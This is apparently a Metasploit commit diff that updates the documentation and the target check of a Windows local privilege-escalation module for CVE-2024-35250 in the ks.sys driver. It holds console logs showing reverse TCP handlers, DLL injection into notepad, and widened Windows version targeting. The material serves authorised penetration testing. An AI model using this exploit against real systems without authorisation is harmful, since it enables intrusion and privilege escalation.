Updated docs and check

documentation/modules/exploit/windows/local/cve_2024_35250_ks_driver.md

@@ -56,10 +56,8 @@ msf6 exploit(windows/local/cve_2024_35250_ks_driver) > rexploit
 [*] Reloading module...
 
 [*] Started reverse TCP handler on 192.168.123.1:5555
-[!] SESSION may not be compatible with this module:
-[!]  * incompatible session type: meterpreter. This module works with: .
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable.
+[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows 10+ Build 19045
 [*] Launching notepad to   host the exploit...
 [*] The notepad path is: C:\Windows\System32\notepad.exe
 [*] The notepad pid is: 1012
@@ -85,7 +83,7 @@ msf6 exploit(windows/local/cve_2024_35250_ks_driver) > run
 
 [*] Started reverse TCP handler on 192.168.123.1:5555
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Version detected: Windows 10+ Build 14393
+[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows 10+ Build 14393
 [*] Launching notepad to host the exploit...
 [*] The notepad path is: C:\Windows\System32\notepad.exe
 [*] The notepad pid is: 4272
@@ -111,11 +109,9 @@ meterpreter >
 msf6 exploit(windows/local/cve_2024_35250_ks_driver) > run
 
 [*] Started reverse TCP handler on 192.168.123.1:5555
-[!] SESSION may not be compatible with this module:
-[!]  * incompatible session type: meterpreter. This module works with: .
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable.
-[*] Launching notepad to   host the exploit...
+[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows 10+ Build 22621
+[*] Launching notepad to host the exploit...
 [*] The notepad path is: C:\Windows\System32\notepad.exe
 [*] The notepad pid is: 6948
 [*] Reflectively injecting the DLL into 6948...
@@ -142,7 +138,7 @@ msf6 exploit(windows/local/cve_2024_35250_ks_driver) > rexploit
 
 [*] Started reverse TCP handler on 172.16.199.1:5555
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Version detected: Windows Server 2016+ Build 20348
+[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2016+ Build 20348
 [*] Launching notepad to host the exploit...
 [*] The notepad path is: C:\Windows\System32\notepad.exe
 [*] The notepad pid is: 7336
@@ -169,7 +165,7 @@ msf6 exploit(windows/local/cve_2024_35250_ks_driver) > run
 
 [*] Started reverse TCP handler on 172.16.199.1:5555
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Version detected: Windows Server 2016+ Build 14393
+[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2016+ Build 14393
 [*] Launching notepad to host the exploit...
 [*] The notepad path is: C:\Windows\System32\notepad.exe
 [*] The notepad pid is: 316

modules/exploits/windows/local/cve_2024_35250_ks_driver.rb

@@ -69,7 +69,7 @@ def target_compatible?(version)
     vprint_status("Windows Build Number = #{version.build_number}")
 
     return true if version.build_number.between?(Msf::WindowsVersion::Win10_1607, Msf::WindowsVersion::Win10_22H2)
-    return true if version.build_number == Msf::WindowsVersion::Win11_21H2
+    return true if version.build_number == Msf::WindowsVersion::Win11_21H2 || version.build_number == Msf::WindowsVersion::Win11_22H2
     return true if version.build_number.between?(Msf::WindowsVersion::Server2016, Msf::WindowsVersion::Server2022)
 
     false